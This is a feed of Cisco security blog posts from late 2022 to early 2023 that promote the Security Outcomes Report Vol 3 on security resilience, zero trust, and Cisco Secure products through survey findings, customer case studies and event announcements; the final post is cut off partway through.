
☐ ☆ ✇ Security – Cisco Blog

Achieving Security Resilience: Findings from the Security Outcomes Report, Vol 3

By Lothar Renner — January 10th 2023 at 18:18

I am excited to announce the release of Cisco’s annual flagship cybersecurity report, the Security Outcomes Report, Volume 3: Achieving Security Resilience. It’s about preparing, adapting, and overcoming security challenges and threats, and an organisation’s ability to respond and emerge stronger.It’s the organization’s ability to respond to the inevitable attacks and unexpected events that come our way. In a recent webinar on Security Trends for 2023, the team spoke about laying a good foundation, and when you do, good outcomes will come from that. The Security Outcomes Report, Vol.3 looks at the most important factors that will help you build that foundation and give you the most successful security outcomes.

An EMEA perspective

When it came to the top priority security outcome for organisations, Europe, the Middle East and Africa (EMEA) were in line with global findings. Preventing major security incidents and losses, mitigating financial losses from security incidents, and adapting to unexpected external change events or trends, were the top three. Interestingly, security leaders prioritised mitigating financial losses whereas more technical and operational security respondents placed the highest importance on preventing major incidents. It’s of course understandable to have differing focuses at different levels but this highlights the importance of agreeing and communicating shared objectives and goals.

When asked to their rate overall resilience, respondents from France had the highest score in EMEA, closely followed by Italy and the Netherlands. Germany had the lowest score (significantly lower than the rest of region and the globe). Slightly contrary to this, when asked how confident they would be to remain resilient in a ‘worst case’ cybersecurity event, France came out second to last with only 27% saying they are strongly confident. The most confident country is the Netherlands with 54%.

Globally across all sizes of business the security outcome that organizations most struggle with is recruiting and retaining talented security personnel; the UK and Germany also noted this as top, reinforcing the ongoing battle against the security skills gap.

Seven success factors

The report analyses the seven success factors that have shown to improve overall security resilience:

  1. Establishing executive support can increase security resilience by 39%.
  2. Cultivating a culture of security boosts security resilience by 46%.
  3. Holding resources in reserve (don’t max out or overwork your staff) can increase it by up to 15%.
  4. Simplifying hybrid cloud environments makes an 18% difference over complex ones. ​
  5. Maximizing zero trust adoption can lead to 30% gains.​
  6. Extending detection and response capabilities show 45% better resilience scores.
  7. Taking security to the edge improves resilience by 27%.

I’d encourage you to read the full report, there are some great takeaways on how organizations can improve their resilience with a focus on these areas.

About the Security Outcomes Report

The report is based on an anonymous survey 4,751 active cybersecurity experts from 26 countries. Analysis was done by the Cyentia Institute on behalf of Cisco. EMEA countries represented are France, Germany, Italy, Saudi Arabia, Spain, The Netherlands and the UK.

The report is available in English, German and French.

To learn more about the findings from this report and the Duo Trusted Access Report, join our webinar: Trust No One – Secure Everyone: EMEA insights into a Zero Trust approach

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Why Zero Trust Helps Unlock Security Resilience

By Richard Archdeacon — January 6th 2023 at 13:00

Speaking to many CISOs, it’s clear that many security executives view zero trust as a journey that can be difficult to start, and one that even makes identifying successful outcomes a challenge. Simultaneously, the topic of security resilience has risen up the C-level agenda and is now another focus for security teams. So, are these complementary? Or will they present conflicting demands that will disrupt rather than assist the CISO in their role?

One of the most striking results coming from Cisco’s latest Security Outcomes Report is that organizations with a mature zero trust implementation – those with basic controls, constant validation and automated workflows – experience a 30% improvement in security resilience compared to those who have not started their zero trust journey. So, these two initiatives – implementing zero trust and working to achieve security resilience – appear to complement each other while supporting the CISO when a cyber black swan swims in.

Security resilience is the ability to withstand an incident and recover more strongly. In other words, ride out the storm and come back better. Meanwhile, zero trust is best known as a “never trust, always verify” principle. The idea is to check before you provide access, and authenticate identity based on a risk profile of assets and users. This starts to explain why the two are complementary.

Cisco Security Outcomes Report: Resilience Outcomes - Ranked by Importance

The top security resilience outcomes

The Security Outcomes Report summarizes the results of a survey of more than 4,700 security professionals. Among the insights that emerge are nine security resilience outcomes they consider most important. The top three outcomes for resilience are prevention, mitigation and adaptation. In other words, they prioritize first the ability to avoid an incident by having the right controls in place, then the ability to reduce and reverse the overall impact when an incident occurs, and then the ability to pivot rapidly without being bound by too rigid a set of systems. Zero trust will support these outcomes.

Preventing, or reducing the likelihood of a cybersecurity incident, is an obvious first step and no surprise as the most important outcome. Pursuing programs that identify users and monitor the health of devices is a crucial a preventative step. In fact, simply ensuring that multifactor authentication (MFA) is ubiquitous across the organization can bring an 11% improvement in security resilience.

When incidents occur, security teams will need a clear picture of the incident they are having to manage. This will help in them respond quickly, with a proactive determination of recovery requirements. Previous studies show that once a team achieves 80% coverage of critical systems, the ability to maintain continuity increases measurably. This knowledge will also help teams develop more focused incident response processes. A mature zero trust environment has also been found to almost double a team’s ability to streamline these processes when compared to a limited zero trust implementation.

Communication is key

When talking to CISOs about successful implementation programs, communication within the business emerges as a recurring theme. Security teams must inform and guide users through the phases of zero trust implementation, while emphasizing the benefits to them. When users are aware of their responsibility to keep the organization secure, they take a participatory role in an important aspect of the business. So, when an incident occurs, they can support the company’s response. This increases resilience. Research has shown that a mature program will more than double the effect of efforts to improve the security culture. Additionally, the same communication channels established to spread the word of zero trust now can be called upon when an incident requires immediate action.

Mature implementations have also been seen to help increase cost effectiveness and reduce unplanned work. This releases more resource to cope with the unexpected – another important driver of resilience surfaced in Volume 3 of the Security Outcomes Report. Having more efficient resources enables the security function to reallocate teams when needed. Reviewing and updating resource processes and procedures, along with all other important processes, is a vital part of any of any change initiative. Mature zero trust environments reflect this commitment continuous assessment and improvement.

Adapt and innovate

Inherent in organizational resilience is the ability to adapt and innovate. The corporate landscape is littered with examples of those who failed to do those two things. A zero trust environment enables organizations to lower their risk of incidents while adapting their security posture to fit the ongoing changes of the business. Think of developing new partners, supporting new products remotely, securing a changing supply chain. The basic tenets of MFA – including continuous validation, segmentation and automation – sets a foundation that accommodates those changes without compromising security. The view that security makes change difficult is becoming obsolete. With zero trust and other keys to achieving security resilience, security now is a partner in business change. And for those CISOs who fear even starting this journey, understanding the benefits should help them take that first step.

Download the Security Outcomes Report, Vol. 3: Achieving Security Resilience today.

Learn more about cybersecurity research and security resilience:

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A Holiday Gift of Savings with Cisco Secure Choice EAs

By Kathy Miller — December 20th 2022 at 09:45

Give the gift of security resilience and receive instant savings from a secure choice enterprise agreement.

When it comes to the holidays, most thoughts turn towards shopping and spending time with friends and loved ones. In the business world, the holiday season often lands at the end of the quarter / fiscal year, and businesses start to make lists of things that need to be purchased in the coming years, and sometimes they find themselves wanting to purchase a gift – so to speak – for themselves.

The problem that many organizations face is that when it comes to purchasing products and services, balancing today’s needs and budget isn’t as easy as it sounds. Add to this the concern of unclear future security needs which can be stressful. But what if you could get exactly what you need, protect the budget and future-proof your investment at the same time?

We want to give a gift to you. That is right, you read that correctly. We want to make your holidays a little bit more special with the gift of security resilience. And we can offer that to you with instant savings.

Build Out Your Security Resilience

Here are a few examples of how you can build the gift of security resilience that best fits your organization’s security needs today and is ready to grow with your tomorrow.

User and Device Security

Provide edge to edge protection. Hold the first line of defense against cyberthreats for branch offices and remote users. Maintain the last line of defense, by protecting your endpoint devices with rapid incident detection, response, and remediation of advanced threats.

Provide protection for your users and devices with these essential Cisco Secure products.

Cloud and Application Security

Protect what matters, get cloud and application protection that secures internet access, safeguards cloud app usage, and identifies public cloud threats. Build out your cloud and application security with these essential Cisco Secure products.

Zero Trust Secure Access

Cisco Secure Zero Trust helps you transform your business with continuous verification of users and devices for secure access. These Cisco Secure products are part of the essential architecture towards building zero trust secure access.

Your Gift Starts with Two

Choose any of the two Cisco Secure products that you want to buy towards building out user and device security, cloud and application security, zero trust secure access, or any of our security solutions. You do not have to stop with two, you have the freedom to grow; add more, save more.

Cisco Secure products you can choose from:

  • Cisco Secure Endpoint offers advanced endpoint protection across control points, enabling your business to stay resilient.
  • Cisco Umbrella offers the gift of flexible, cloud delivered security. It combines multiple security functions into one solution, so you can extend data protection to devices, remote users, and distributed locations anywhere.
  • Cisco Secure Firewall helps you plan, prioritize, close gaps, and recover from disaster stronger.
  • Secure Access by Duo helps you adapt to the changing threat landscapes faster with full scale visibility and unmatched reliability, all from an interface so simple that anyone can use it.
  • Cisco Secure Email helps you rapidly detect, quarantine, investigate, and remediate cyberattacks that target your email.
  • Cisco Secure Network Analytics analyzes your existing network data to help detect threats that may have found a way to bypass your existing controls, before they can do serious damage.
  • Cisco Kenna Security manages vulnerability by cutting costs, saving time, and keeping your teams focused on reducing the biggest risks to your business.
  • Cisco Identity Services Engine (ISE) enables an automated approach to discover, profile, authenticate, and authorize trusted endpoints and end users connecting to the self-managed network infrastructure, regardless of access medium.
  • Cisco Cloudlock is a cloud-native cloud access security broker (CASB) that helps you move to the cloud safely. It protects your cloud users, data, and apps. Cloudlock’s simple, open, and automated approach uses APIs to manage the risks in your cloud app ecosystem. With Cloudlock you can more easily combat data breaches while meeting compliance regulations.
  • Cisco Secure Workload seamlessly delivers a zero-trust approach to securing your application workloads across any cloud and on-premises data center environments by reducing the attack surface, preventing lateral movement, identifying workload behavior anomalies, and remediating threats quickly.

Give the Gift of Security with a Cisco Secure Choice Enterprise Agreement

Choose, buy, and deploy Cisco Secure products through one easy-to-manage Cisco Secure Choice Enterprise Agreement; save more as you buy more for all of those on your holiday list. Protect your end users working remotely, in office only, or in a hybrid environment as with more devices on and off the network, cybersecurity risks are not slowing down anytime soon. Build the solution that best fits your organization through a single, flexible agreement that lets you pay annually, as you go, over 3 or 5 years, with 0% financing.

With Cisco’s Secure Choice Enterprise Agreements, you can add security resilience in 2023 and beyond, with exactly the security products and services you need, right when you need them the most.

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Is your firewall stuck in the 80s?

By Neville Letzerich — December 13th 2022 at 16:00

Modernize your firewall for greater security resilience

Cybersecurity has changed dramatically since the dawn of firewalls in the 1980s. But despite all the upheaval and innovation, they have stood the test of time. The basic concept of allowing “good” traffic to flow and blocking the bad stuff remains essential. Of course, it looks much different now than in the era of Care Bears and Cabbage Patch Kids.

Today’s workers, data, and applications are everywhere, and firewalls must be as well. There’s no longer just one finite space to defend. With the recent explosion of hybrid work and the rapid transition to multi-cloud environments, it’s imperative that firewalls evolve alongside a business — and be ready for whatever’s next.

So, can your firewall grow with you? Or is it stuck in the age of Hair Bands and He-Man?

The firewall is a critical foundation for security

The past few years have brought about a keen focus on resilience — remaining strong, yet adaptable in the face of unexpected and even unfathomable challenges. But an organization cannot persevere without security being at the forefront of any resilience strategy.

96% of executives consider security resilience highly important to their business.

Cisco Security Outcomes Report

Firewalls are a critical foundation for building powerful, resilient security infrastructure. Yet contemporary firewalls have to be and do more than one thing. Cisco Secure Firewall delivers world-class security controls wherever you need them, with unified visibility and consistent policy management and enforcement.

As a worldwide leader in networking and security, Cisco is better positioned than any other vendor to incorporate effective firewall controls into your infrastructure — anywhere your data and applications reside. According to a study conducted on behalf of Cisco by Forrester Research, Cisco Secure Firewall customers can:

  1. Reduce the risk of a breach by up to 80%
  2. Cut time needed for routine tasks by as much as 95%
  3. Achieve an ROI of 195% and a payback period of just 10 months

Cisco Secure Firewall delivers on several key aspects necessary for security resilience: visibility, flexibility, intelligence, integration, and unified controls. Together, they enable organizations to close gaps, see and detect threats faster, and adapt quickly to change.

Watch video: Cisco Secure Firewall Overview

VISIBILITY for better threat detection

With most of today’s internet traffic being encrypted, security measures can become obsolete without the ability to see into all traffic, encrypted or not. While decryption is commonplace, it is simply not feasible in many cases, and can have serious impacts on network performance. With its Encrypted Visibility Engine, Cisco Secure Firewall leverages deep packet inspection (DPI) to identify potentially malicious applications in encrypted traffic without offloading to another appliance and degrading performance.

Due to a highly distributed network and workforce, as well as constantly maturing attacks, the ability to see into every corner of your ecosystem is crucial. Cisco Secure Firewall blends multiple technologies to detect and block more threats in more places. By combining traditional firewall capabilities with URL filtering, application visibility and control, malware defense, and Snort 3 intrusion prevention, organizations gain robust protection against even the most sophisticated threats.

FLEXIBILITY for comprehensive coverage

Cisco offers a wide variety of firewalls for defending the different areas of your network — including physical, virtual, and cloud-native — as well as cloud-delivered. We can secure businesses and offices of all types and sizes, from the data center to the cloud.

Cisco Secure also provides flexible firewall management options, enabling you to deploy and operate your security architecture in a way that is tailored to the unique requirements of your NetOps, SecOps, and DevOps teams. No matter which firewall models you choose or environments you operate in (physical or virtual), you can use a single, simplified application to manage all your firewalls from one place.

THREAT INTELLIGENCE for rapidly updated defenses

The threat landscape changes every day, and our defenses must change with it. Cisco Talos is one of the largest and most trusted threat intelligence groups in the world. Its in-depth insight into global threats, and advanced research and analysis, enable us to quickly incorporate protections for new threats into our products via hourly updates. That way, Cisco customers are continuously safeguarded from both known and unknown threats.

“When the Log4j vulnerability was discovered, we were protected before we even completed our patching,” said Paul Smith, network administrator at Marian University. “As a result of automated hourly updates from Talos, Cisco Secure Firewall had an early detection signature, so it was already blocking the concerning traffic from infiltrating our network.”

INTEGRATION for centralized protection and automation

Another differentiator for Cisco Secure Firewall is that it’s part of an integrated security ecosystem. With Cisco SecureX, organizations can correlate data from multiple technologies and unleash XDR capabilities for a centralized, automated response to threats.

“At the end of the day, it’s about protecting the data, and we do that with the integration of [Cisco] Secure Endpoint, Umbrella, and Secure Firewall, which combine to protect the networks, endpoints, workstations, and servers — and all of this can be correlated easily within SecureX.”

– Elliott Bujan, IT Security Manager, Marine Credit Union

UNIFIED CONTROLS for efficacy and ease-of-management

The new Cloud-delivered Firewall Management Center leverages the cloud to facilitate agile, simplified operations for a distributed, hybrid network. It provides efficiency at scale by allowing security teams to swiftly deploy and update policies across their environment with just a few clicks, as well as take coordinated actions to prioritize, investigate, and remediate threats within a single pane of glass. And with a cloud-delivered management center, Cisco regularly updates its software behind the scenes, which reduces risk, maintains compliance, and gives your team more time to focus on other priorities.

Additionally, Cisco Secure Firewall dynamically shares policies driven by intelligence from Cisco Secure Workload, which uses microsegmentation to prevent lateral movement of attackers throughout a network. This allows security policies to be harmonized across both the network and application environments, boosting efficacy and fostering collaboration between teams.

Innovating for the future

These are just some examples of what makes up a comprehensive, modernized firewall. But Cisco is not stopping there. We continue to innovate to meet evolving business needs. For example, the new enterprise-class 3100 Series firewalls are specially designed for hybrid work, supporting more end users with high-performance remote access for increased organizational flexibility.

Additionally, Cisco Secure Firewall serves as a key component of advanced security strategies including XDR, SASE, and zero trust, helping businesses keep pace with accelerating digital transformation. According to Cisco’s most recent Security Outcomes Report, organizations with mature XDR, SASE, and zero trust implementations all boast significantly higher levels of security resilience.

Enhance your resilience with Cisco Secure Firewall

Fuel and energy retailer, Ampol, uses a variety of Cisco technologies, including Secure Firewall, to segment and safeguard its network. “Cisco was an integral part of our success during COVID-19 as we were able to serve customers without interruption in stores,” said Amir Yassa, senior project specialist at Ampol. “Deploying our retail resilience project, mostly comprised of Cisco products, enabled us to reduce our IT-related incidents by 90%, thus enabling us to serve our customers better now and into the future.”

Is your firewall keeping up with future demands, or is it still stuck in the 80s teasing its hair? If it’s the latter, we can help. Visit and learn how to refresh your firewall.


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Preparing for 2023 and what lies in store for Endpoint Security

By Pat Correia — December 9th 2022 at 13:00

A new year is almost upon us and as we look back on our accomplishments in 2022, we also look forward to helping our customers become more security resilient and be better prepared for 2023. As part of this forward-looking process, and with the help of Gartner Peer Insights, we surveyed 100 Security and IT professionals to understand their level of security maturity and obtain their perspective on the future.

The results of the survey, called “Gartner Peer Insights – Future of Endpoint Security” can be found here in Infographic form.

Key insights from the Survey:

  • Many organizations are employing EDR and XDR capabilities, but few have reached full maturity.
  • Organizations are looking for integrated platforms that support hybrid workforces while simplifying vendor management.
  • In anticipation of the ever-increasing threat landscape, organizations are looking to highly integrated and automated endpoint security solutions.
  • Organizations want future-proof endpoint security solutions that bolster their security resilience.

Insight Example

Regarding the first key insight, approximately two-thirds of the organizations surveyed have implemented EDR and XDR capabilities. These two capabilities are critical to detecting and eliminating threats, either before a breach has occurred or before a breach has had an opportunity to create damage.

Figure 1: Deployed endpoint security capabilities

Insight Example

Another key insight is related to endpoint vendor selection. In the survey, it’s noted that the top criterion organizations are looking for when selecting an endpoint security solution is the ability to support a hybrid workforce. This isn’t surprising given the events that have occurred over the last few years and the mix of remote workers expanding to working from home. Many organizations feel that the hybrid workforce is here to stay, in varying levels of remote workforce vs. on-premises workforce. The obvious implications directly related to the endpoint solutions are flexibility (e.g., deployment options), scalability, efficacy, resilience, and manageability, as a few examples.

Endpoint Security
Figure 2: Top Motivations when considering endpoint security


The survey infographic provides much more insights than these two examples. The good news is that Cisco Secure Endpoint meets the challenges ahead for 2023 and beyond. If you haven’t researched Secure Endpoint lately, go here to see What’s New.

To find out more insights from the 100 Security and IT professionals we surveyed, please read the “Gartner Peer Insights – Future of Endpoint Security” survey.

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Cracking the Code to Security Resilience: Lessons from the Latest Cisco Security Outcomes Report

By Wendy Nather — December 7th 2022 at 02:30

“There’s so much left to know, and I’m on the road to find out.” –Cat Stevens (Yusuf)

Two years ago, we asked the question: What actually works in cybersecurity?

Not what everyone’s doing—because there are plenty of cybersecurity reports out there that answer that question—but which data-backed practices lead to the outcomes we want to implement in cybersecurity strategies?

The result was the first Security Outcomes Report, in which we analyzed 25 cybersecurity practices against 11 desired outcomes. And thanks to a large international respondent group, together with the mighty data science powers of the Cyentia Institute, we got some good data that raised as many questions as it answered. Sure, we found some strong correlations between practices and outcomes, but why did they correlate?

Last year, our second report focused in on the top five most highly correlated practices and tried to reveal more detail that would give us some guidance on implementation. We found that certain types of technology infrastructure correlated more with those successful practices, and therefore with the outcomes we’re seeking. Is architecture really destiny when it comes to good security outcomes? It does appear to be the case, but we had more research ahead of us to be more confident in a statement that sweeping.

All the while, we’ve been listening to readers considering what they’d like to glean from this research. One big question was, “How do we turn these practices into management objectives?” In other words, now that we have some data on practices we should be implementing, how do we set measurable goals to do so? I’ve led workshops in the UK and in Colombia to help CISOs set their own objectives based on their risk management priorities, and we’ve worked to identify longer-term targets that require close alignment with business leaders.

Achieving security resilience

Another question that took a front-row seat in our presentations and just wouldn’t leave: the topic of cyber resilience, or security resilience. It’s almost reached the status of a buzzword in the security industry, but you can understand why it’s ubiquitous.

“Among the upheaval of the pandemic, political unrest, economic and climate turbulence, and war, everyone is struggling to find a new ‘business as usual’ state that includes being able to adapt better to the shaky ground beneath them.”

But what exactly is security resilience, anyway? What does it mean to security practitioners and executives around the world? And what are the associated cybersecurity outcomes that we can identify and correlate? We know it doesn’t simply mean preventing bad things from happening; that ship has sailed (and sunk). We also know that security resilience doesn’t always mean full recovery from an event or condition that has knocked you down. Rather, it means continuing to operate during an adverse situation, either at full or partial capacity, and mitigating the effects on stakeholders. Ideally speaking, security resilience also means learning from the experience and emerging stronger.

What’s new in Volume 3

Security resilience is the focus of the third volume of our Security Outcomes Report: Achieving Security Resilience. It tells us how 4,700 practitioners across 26 countries are prioritizing security resilience: what it means to them, what they’re doing successfully to achieve it, and what they’re struggling with. Once again, the data gives us interesting ideas to ponder.

A stronger security culture boosts resilience by as much as 46%. By “culture,” we don’t mean annual compliance-driven awareness training. Cybersecurity awareness is what you know; security culture is what you do. When organizations score better at being able to explain just what it is that they need to do in security and why, they make better decisions in line with their security values, and that leads to better overall security resilience.

It doesn’t matter how many people you have; it matters whether you have any of them available in reserve to respond to events. Organizations with a flexible pool of talent internally (or on standby externally) show anywhere from 11% to 15% improvement in resilience. Which makes sense, as a fully leveraged team will be strained if they have to work even harder to take on an incident.

Because so many organizations around the world are looking to the NIST Cybersecurity Framework as a guidepost for cybersecurity practices, we also analyzed which NIST CSF capabilities correlated most strongly with our list of resilience outcomes. For example, our survey respondents that do a great job tracking key systems and data are almost 11% more likely to excel at containing the spread and scope of security incidents. From one angle, this seems like an obvious result, hardly worth mentioning. On the other hand, it’s worth presenting to your management some data that shows that investing in asset inventory solutions really does have long-range effects on your ability to stop an intrusion.

NIST Cybersecurity Framework activities correlated with security resilience outcomes.

And there’s much more. The report identifies—and then explores—seven success factors that, if achieved, boost our measure of overall security resilience from the bottom 10th percentile to the top 10th percentile. These include establishing a security culture and properly resourcing response teams, among others.

I hope this introductory blog—the first in a series exploring this latest report—whets your appetite to read the report itself. And remember, we are always aiming to reveal the next undiscovered insight that leads to better security outcomes. Please share your feedback and research requests with us in the comments below, or talk to us at the next security conference.

For more insights like what you’ve seen in today’s blog take a look at the Security Outcomes Report, Volume 3: Achieving Security Resilience.

Explore more data-backed cybersecurity research and other blogs on security resilience:

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Modernizing the Security of Australia’s Largest Fuel Network

By Lisa Snow — December 6th 2022 at 13:00

Ampol has been Australia’s leading transport fuel company since 1900. What began over 125 years ago is now an organization that powers a country, operating 1,500 retail stores and stations across ANZ, plus 89 depots for refining and importing fuels and lubricants, and 8,200 employees throughout Australia, New Zealand, the United States, and Singapore. And while Ampol’s history goes back a century, they are a modern organization, using internet of things (IoT) technology across operational and retail locations, with sensors on everything from electric vehicle charging units to fuel tank gauges to transportation trucks to refrigeration units inside retail stores.

As a critical energy provider to a country of over 25 million people, Ampol’s security needed to match its evolving infrastructure. As Satish Chowdhary, Network Enterprise Architect, said, “At Ampol, we have implemented sensor technology across our network: from gauges in the fuel tanks to monitor fuel quality and quantity to sensors that monitor the temperature in various refrigerators across our retail sites to ensure goods stay chilled. It’s critical to manage these devices effectively and securely, and that’s where Cisco comes in…With IoT, a major security risk is posed by dodgy legacy devices left unpatched and vulnerable within your network. Cisco’s TrustSec and VLAN segregation automatically isolate vulnerable devices, not exposing the rest of the network to risks from untrusted devices.”


Making security an enabler, not a hindrance

In addition to securing the IoT that let’s Ampol monitor and manage its critical operations, Cisco was able to create a comprehensive security environment that solved for their three strategic goals.

“Three key components of our cyber-resilient strategy were isolation, orchestration, and rapid recovery. Cisco SecureX nailed all three providing us a single interface to see all security events, and malicious files, thus expediting how fast we can isolate events and recover,” Chowdhary explained.  “Before using Cisco Secure, security was a hindrance, not an enabler for our IT team, employees, and even customers,” he added.

In fact, Cisco Secure helped Ampol improve their security posture so much that they were able to quickly pivot during the early days of the pandemic.

“When Covid triggered supply challenges during lockdowns, people not being able to access groceries turned to their local service station convenience stores to get what they needed.  For Ampol, maintaining that supply continuity was critical, not just for our business, but for the customers who were relying on us to get their supplies. And all of this was done when many employees were now having to work remotely… This was possible only because we could maintain our revamped locations, staff, clients, and business partners safe on our network – while still maintaining speed and efficiency. Cisco Secure was the ticket to Ampol’s resilience in the face of major change,” Chowdhary said.

Solving security challenges with speed and simplicity

In addition to enabling flexibility against supply chain fluctuations, Ampol is readily protected against  threats, cyberattacks, and other vulnerabilities. Their Cisco security solution included:

  • Cisco Secure Firewall and Identity Service Engines (ISE) allow Ampol’s 3rd-party vendors to safely access the network
  • Cisco Umbrella and Secure Endpoint protected network and wi-fi access at retail locations
  • Cisco Duo protected the SCADA pipeline network users and devices against phishing attacks and established device trust
  • Improved efficiency and threat detection with Cisco SecureX

“The major force for our Cisco Secure investment was simplification by integrating the entire Security portfolio…If we ever happen to have a cyber-attack, we can quickly find it and contain it,” Chowdhary said, adding, “The greatest outcome of using Cisco Secure is simplicity at its core. We achieved great efficiency integration, better visibility, and context that’s not hidden across five, ten, or fifteen consoles, and ultimately, greater security outcomes.”

To find out how else Cisco Secure is helping protect Ampol against sophisticated threats and other challenges, read the full Ampol case study.

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ALL IN at Cisco Live 2022 Melbourne: Building Security Resilience for the Modern Enterprise

By Yoshiyuki Hamada — November 29th 2022 at 13:00

After a three-year hiatus, Cisco Live 2022 Melbourne is back! Personally, it will be a special experience, attending with my team and leaders for the first time as the Asia Pacific Cybersecurity Lead.

I will be speaking on the “Top Priorities for IT and Security Leaders in 2023” on 7 December at the Cisco Secure Insights Live, covering key priorities for security leaders as we enter the new year. Please join me at the Security Experience Hub at the World of Solutions. You can also participate virtually.

Experts’ Insights on Enabling a Strong Security Culture and Resilience 

Today’s businesses require a strong culture of security and resilience that is pervasive throughout the organization to withstand uncertainty and emerge stronger. Hear from our Cisco security leaders on powering resilience across the enterprise in the following presentations:

Dive into 80+ security sessions by experts to uncover best practices to address key challenges, and maximize your technology investments.

Security Experience at the World of Solutions 

Explore the Security Experience Hub and Demo Stand at the World of Solutions Zone for exciting security activities:

  • Cybersecurity Operations Center – features demos on how to optimize security operations and empower your SecOps team with deep visibility and automation to enable them to effectively secure the business.
  • Cisco Secure Insights Live – 30+ bite-sized sharing sessions by industry experts and leaders on trends, innovations and the current threat landscape.
  • Security Demo Stand – end-to-end solution portfolio showcase, including Application Security, Extended Detection and Response (XDR), Network Security, Secure Access Service Edge (SASE) and Cloud Security, Secure Analytics, Secure Email, SecureX, Services and Zero Trust Security.
  • Security Resilience Pod – evaluate and benchmark your security posture , and get recommendations on how to improve existing security programs.

For those joining us online, we have the Cisco Secure Insights Live broadcast on all things security, and Cisco Live broadcast covering keynote presentations by industry leaders.

I’m excited for you to see how we can help you achieve security resilience and look forward to meeting you at Cisco Live 2022 Melbourne. I’m ALL IN, are you?


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What’s NEXT with Michael Ebel at Atmosfy

By Tazin Khan — November 22nd 2022 at 18:58

Throughout my career, I have noticed the way we “futurize” technology. Often, we are thinking of technology in five-to-ten-year increments. But the fact of the matter is – technology is moving faster than we can keep up. The minute we think we understand it, it’s already onto something new. That’s why here at Cisco, we’re focused on what’s NEXT. We all know technology will continue to grow at a rapid pace, our goal is to remain at the forefront of these changes.

After much anticipation, it’s finally here! I am excited to present the first episode of “NEXT” by Cisco Secure! “NEXT” is a video series illuminating simple conversations about complex topics. Our mission is twofold: First, we want to humanize cybersecurity. Second, we want to build a bridge between Cisco Secure and the ideas of the future.

CTO of Cisco Secure, TK Keanini and I sit down with Michael Ebel, CEO of Atmosfy. If you saw our preview, then you know Atmosfy is on a mission to help inspire others and support local restaurants through live videos.

What you’ll learn in this episode:

  • How an ex-bartender turned Air Force Captain took the turn to become a tech founder.
  • What it means to be resilient in one’s security practice.
  • How security isn’t just the security team’s responsibility, it’s everyone’s responsibility, including marketing, PR, business operations, even your customers.

Want to learn what’s NEXT for Michael Ebel and Atmosfy? Check out our episode!

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Adapt and overcome: What the story of the Tardigrade can teach us about resilience

By Hazel Burton — November 22nd 2022 at 13:00

When you think about the most resilient creatures in the animal kingdom, what comes to mind?

Perhaps the camel, which can survive for 6 months with no food or water. Or maybe it’s the honey badger, which tends to drink snake venom like cranberry juice.

Or how about the immortal jellyfish? This is one of the most fascinating (and oldest) creatures on Planet Earth. Not only are they immortal, but they also live their lives in Benjamin Button-esque fashion. Turritopsis nutricula jellyfish live to the age of 50 and think, “Well that was fun, but what if I did all of that again in reverse?” When they get back to the beginning, they age forwards again…kind of like the David Fincher film playing on an endless loop, which, I must be honest, felt rather reminiscent of my watching experience.

Those are all fine contenders. But I think the award for the most resilient animal goes to the Tardigrade.

A Tardigrade is a water creature – it needs water to survive. But if there’s a shortage – say, they made their home in a lovely bunch of moss which has unfortunately dried out, they have a plan B.

A Tardigrade will curl up, slow down their metabolism by a factor of 10,000, and can go without a drop of water for decades. Then, when conditions are better, they reboot, rehydrate, and carry on as if nothing has happened. Take that, evolution.

That’s not all. They can also survive temperatures of up to 150 degrees centigrade, without so much as a flinch. How about colder temperatures? Snow problem. (Sorry.) Turn the temperature down to minus 272 centigrade (pretty much Sub Zero), and you’ll defeat the atom, but you won’t make a mark on the Tardigrade.

This one is my favorite: They can survive space travel. In 2008 European scientists sent a colony of 3,000 tardigrades into low grade orbit for 10 days. The majority were able to withstand both cosmic radiation, and the power of the Sun’s UV light.

I guess one question you might ask is, “Why?” Why does a tardigrade need such a robust defense strategy when it’s only a millimetre in size and looks like a cuddly bear under a microscope?

It comes down to adaptation. Tardigrades are water creatures who needed to adapt to occasional droughts. Sure, they may have overshot it a little by including the potential for space travel too. But, they addressed their main threat, and set a more positive course for the future. I think that’s a nice sum up of what being resilient means.

Which brings me to my main reason for this post. I’d like to talk about security resilience, and how it can be the baseline for plotting a stronger future for your organization.

I believe, as with most things, that security resilience starts with people – looking after them, giving them what they need to flourish, and in most cases, getting out of their way.

That all sounds basic. However, the scale of what our people and security teams need to protect within the enterprise and the internet as a whole, keeps getting bigger. Not everything’s in the data center, and not everything’s in the cloud. Addressing the core challenges, and adapting as needed, is central to a security resilience strategy.

This involves moving away from a siloed security policy that is only focused on threat prevention and treats all alerts and threats equally. Not only is this way inefficient – it wears defenders out. We can’t prevent everything, so we must prevent what will affect us most from a security standpoint, while increasing detection and response for anything else that may come our way.

That’s where a detection, response and recovery strategy comes into play. This strategy is underpinned by risk-based contextual analysis (i.e., “Exactly how concerned do we need to be with this new vulnerability?”) and continuous trust assessments.

For your people running daily analysis, this is crucial to help them move from the overwhelming environments that often stem from alert fatigue. Dealing with the latest headline threats is reactive, exhaustive, and is a large component as to why burnout is so prevalent in security. Context-centric security is a key factor to moving away from this.

Cover art for new e-book: Adapt and Overcome: Your guide to building security resilience with Cisco Secure.We explore this concept and more, in our new e-book: Adapt and Overcome: Your guide to building security resilience with Cisco Secure.

In this e-book, we identify the key steps to implementing security resilience. We help you to find the priorities, so you can drive resilience faster, and more efficiently. You will also be able to see this in action, in our case study with the NFL (National Football League).

Later on, we get into some specifics about how Cisco can help you build security resilience across four key areas: risk reduction, visibility, mitigating insider threats, and what to do with actionable intelligence.

Plus, we share some security resilience success principles from other organizations around the world.

Please check out the e-book when you have a moment. I hope the stories, videos and words have meaning for you, and can help your organization as it prepares to meet its current challenges and opportunities.

And finally, remember that with the right security partner, your organization can adapt to change with speed and precision, making informed decisions with the right context at the right time.

Click to read our new e-book: "Adapt and Overcome"

Learn more about how Cisco Secure can help you build your resilience strategy.


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Partner Summit 2022: Let’s Own the Opportunity to Build a World of Secure, Resilient Organizations

By Shailaja Shankar — November 1st 2022 at 11:30

It’s Partner Summit week and, for me, it’s an important reminder that no one company, not even Cisco, can do it alone. Our partners provide diverse perspectives, expertise, and solutions offerings. Each partner plays a key part in delivering the outcomes and experiences our customers need, want, and expect. So, when we say, “Let’s Own It”, it’s a rally cry for Cisco and our partners alike to do our parts to seize the massive opportunity that we have in front of us and turn it into mutual success.

Together, I know we can achieve amazing things. Foremost on my mind right now is both the opportunity and necessity to empower customers with security resilience. Resilience means customers can protect the integrity of every aspect of their business so that they can withstand unpredictable threats or changes and emerge stronger. It’s about providing controlled, trusted access to applications and services, at any time, from any place.

